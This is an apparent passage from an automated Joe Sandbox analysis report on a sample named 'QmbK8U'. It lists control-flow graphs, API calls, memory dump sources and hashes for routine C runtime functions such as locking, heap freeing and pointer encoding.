                                                                                            • Instruction ID: 8c3d291b691994b2727bfcce790a3e7215f07c252b03a126789f53dc26602c21
                                                                                            • Opcode Fuzzy Hash: 21150494291ef5fe72dcf371f1863336afa0e02a295bad6328691068c5e78387
                                                                                            • Instruction Fuzzy Hash: 1521BEB45003049FC754DFA5ED486943BB2BF18342F40601AE58887B70DBB45989AFC6

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00639458,0000000C,00632320,00000000,00000000,?,0063174F,00000003,?,?,?,?,?,?,006310F6), ref: 006321F7
                                                                                            • __crt_waiting_on_module_handle.LIBCMT ref: 00632202
                                                                                              • Part of subcall function 006313E1: Sleep.KERNEL32(000003E8,00000000,?,00632148,KERNEL32.DLL,?,00632194,?,0063174F,00000003), ref: 006313ED
                                                                                              • Part of subcall function 006313E1: GetModuleHandleW.KERNEL32(?,?,00632148,KERNEL32.DLL,?,00632194,?,0063174F,00000003,?,?,?,?,?,?,006310F6), ref: 006313F6
                                                                                            • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0063222B
                                                                                            • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0063223B
                                                                                            • __lock.LIBCMT ref: 0063225D
                                                                                            • InterlockedIncrement.KERNEL32(0063A4D8), ref: 0063226A
                                                                                            • __lock.LIBCMT ref: 0063227E
                                                                                            • ___addlocaleref.LIBCMT ref: 0063229C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002C.00000002.2710014165.0000000000631000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00630000, based on PE: true
                                                                                            • Associated: 0000002C.00000002.2709984751.0000000000630000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710064929.000000000063A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710086468.000000000063C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_44_2_630000_QmbK8U.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                            • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                            • API String ID: 1028249917-2843748187
                                                                                            • Opcode ID: d48e1152523ea5062a06ea28b46f08a3f14626caad1705564076688aac0259a3
                                                                                            • Instruction ID: 586c0dce936d236a8fd58fa9a4f72b6dfc9282abbba5a42a221f029554ca40df
                                                                                            • Opcode Fuzzy Hash: d48e1152523ea5062a06ea28b46f08a3f14626caad1705564076688aac0259a3
                                                                                            • Instruction Fuzzy Hash: 8211DF70800702AFD760AF75DC45B8ABBF2AF10310F20441DF499933A1CB70AA449FA8

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 170 6340a0-6340bb call 63264c call 632345 175 6340da-6340f2 call 632aa0 170->175 176 6340bd-6340c1 170->176 183 6340f4-6340f6 175->183 184 63412a-634136 call 63413b 175->184 176->175 177 6340c3 176->177 179 6340c6-6340c8 177->179 181 6340d2-6340d9 call 632691 179->181 182 6340ca-6340d1 call 631411 179->182 182->181 188 634112-634124 InterlockedIncrement 183->188 189 6340f8-634101 InterlockedDecrement 183->189 184->179 188->184 189->188 193 634103-634109 189->193 193->188 194 63410b-634111 call 6335ee 193->194 194->188
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 006340AC
                                                                                              • Part of subcall function 00632345: __getptd_noexit.LIBCMT ref: 00632348
                                                                                              • Part of subcall function 00632345: __amsg_exit.LIBCMT ref: 00632355
                                                                                            • __amsg_exit.LIBCMT ref: 006340CC
                                                                                            • __lock.LIBCMT ref: 006340DC
                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 006340F9
                                                                                            • InterlockedIncrement.KERNEL32(02BD2AC8), ref: 00634124
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002C.00000002.2710014165.0000000000631000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00630000, based on PE: true
                                                                                            • Associated: 0000002C.00000002.2709984751.0000000000630000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710064929.000000000063A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710086468.000000000063C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_44_2_630000_QmbK8U.jbxd
                                                                                            Similarity
                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                            • String ID:
                                                                                            • API String ID: 4271482742-0
                                                                                            • Opcode ID: ead4b7a454c899583b2ea00fd5e2aa2601648a39331651829fb12cc74812fa6f
                                                                                            • Instruction ID: 90daf3aad1c9c865958ff6d7b17b7bc3bc64007c2b494fd50b26df747dce54b8
                                                                                            • Opcode Fuzzy Hash: ead4b7a454c899583b2ea00fd5e2aa2601648a39331651829fb12cc74812fa6f
                                                                                            • Instruction Fuzzy Hash: 9101C032A01A229BC765AF6488063ADF3A3BF11710F054009F900B7391CF347D91EBEA

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 197 6335ee-6335ff call 63264c 200 633601-633608 197->200 201 633676-63367b call 632691 197->201 202 63360a-633622 call 632aa0 call 6345e4 200->202 203 63364d 200->203 215 633624-63362c call 634614 202->215 216 63362d-63363d call 633644 202->216 205 63364e-63365e HeapFree 203->205 205->201 208 633660-633675 call 632c72 GetLastError call 632c30 205->208 208->201 215->216 216->201 222 63363f-633642 216->222 222->205
                                                                                            APIs
                                                                                            • __lock.LIBCMT ref: 0063360C
                                                                                              • Part of subcall function 00632AA0: __mtinitlocknum.LIBCMT ref: 00632AB6
                                                                                              • Part of subcall function 00632AA0: __amsg_exit.LIBCMT ref: 00632AC2
                                                                                              • Part of subcall function 00632AA0: EnterCriticalSection.KERNEL32(?,?,?,00635600,00000004,00639628,0000000C,00633746,?,?,00000000,00000000,00000000,?,006322F7,00000001), ref: 00632ACA
                                                                                            • ___sbh_find_block.LIBCMT ref: 00633617
                                                                                            • ___sbh_free_block.LIBCMT ref: 00633626
                                                                                            • HeapFree.KERNEL32(00000000,?,00639568,0000000C,00632A81,00000000,006394C8,0000000C,00632ABB,?,?,?,00635600,00000004,00639628,0000000C), ref: 00633656
                                                                                            • GetLastError.KERNEL32(?,00635600,00000004,00639628,0000000C,00633746,?,?,00000000,00000000,00000000,?,006322F7,00000001,00000214), ref: 00633667
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002C.00000002.2710014165.0000000000631000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00630000, based on PE: true
                                                                                            • Associated: 0000002C.00000002.2709984751.0000000000630000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710064929.000000000063A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710086468.000000000063C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_44_2_630000_QmbK8U.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                            • String ID:
                                                                                            • API String ID: 2714421763-0
                                                                                            • Opcode ID: f35b24283bea462049e6d09718d22d488cf21671b3dd9ea1373b792bfbb31c87
                                                                                            • Instruction ID: ea18e6c05d93647911f9f5ce30713e1139d8939d75d5a2d5b913831d71024582
                                                                                            • Opcode Fuzzy Hash: f35b24283bea462049e6d09718d22d488cf21671b3dd9ea1373b792bfbb31c87
                                                                                            • Instruction Fuzzy Hash: E2014B71D04326AFDB606B719C17B9E7AA7AF12760F60500DF540A6392CF388A80CBDD

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 223 633e04-633e1f call 63264c call 632345 228 633e43-633e6c call 632aa0 call 633dc6 call 633e6e 223->228 229 633e21-633e25 223->229 237 633e2f-633e31 228->237 229->228 231 633e27-633e2c call 632345 229->231 231->237 239 633e33-633e3a call 631411 237->239 240 633e3b-633e42 call 632691 237->240 239->240
                                                                                            APIs
                                                                                            • __getptd.LIBCMT ref: 00633E10
                                                                                              • Part of subcall function 00632345: __getptd_noexit.LIBCMT ref: 00632348
                                                                                              • Part of subcall function 00632345: __amsg_exit.LIBCMT ref: 00632355
                                                                                            • __getptd.LIBCMT ref: 00633E27
                                                                                            • __amsg_exit.LIBCMT ref: 00633E35
                                                                                            • __lock.LIBCMT ref: 00633E45
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002C.00000002.2710014165.0000000000631000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00630000, based on PE: true
                                                                                            • Associated: 0000002C.00000002.2709984751.0000000000630000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710064929.000000000063A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002C.00000002.2710086468.000000000063C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_44_2_630000_QmbK8U.jbxd
                                                                                            Similarity
                                                                                            • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                            • String ID:
                                                                                            • API String ID: 3521780317-0
                                                                                            • Opcode ID: d1c834365e6666d2636e2808c4347629fd99785d861c6d72073b7152228d8e85
                                                                                            • Instruction ID: 8a8a427b5d3064e2855395e1f4085eb5303f0f295da68ac74025f1f6ebcda6c2
                                                                                            • Opcode Fuzzy Hash: d1c834365e6666d2636e2808c4347629fd99785d861c6d72073b7152228d8e85
                                                                                            • Instruction Fuzzy Hash: EFF030329047229BD7A0BBB4881778D73A3AF44B20F50455EE441973E2CF749A419BDA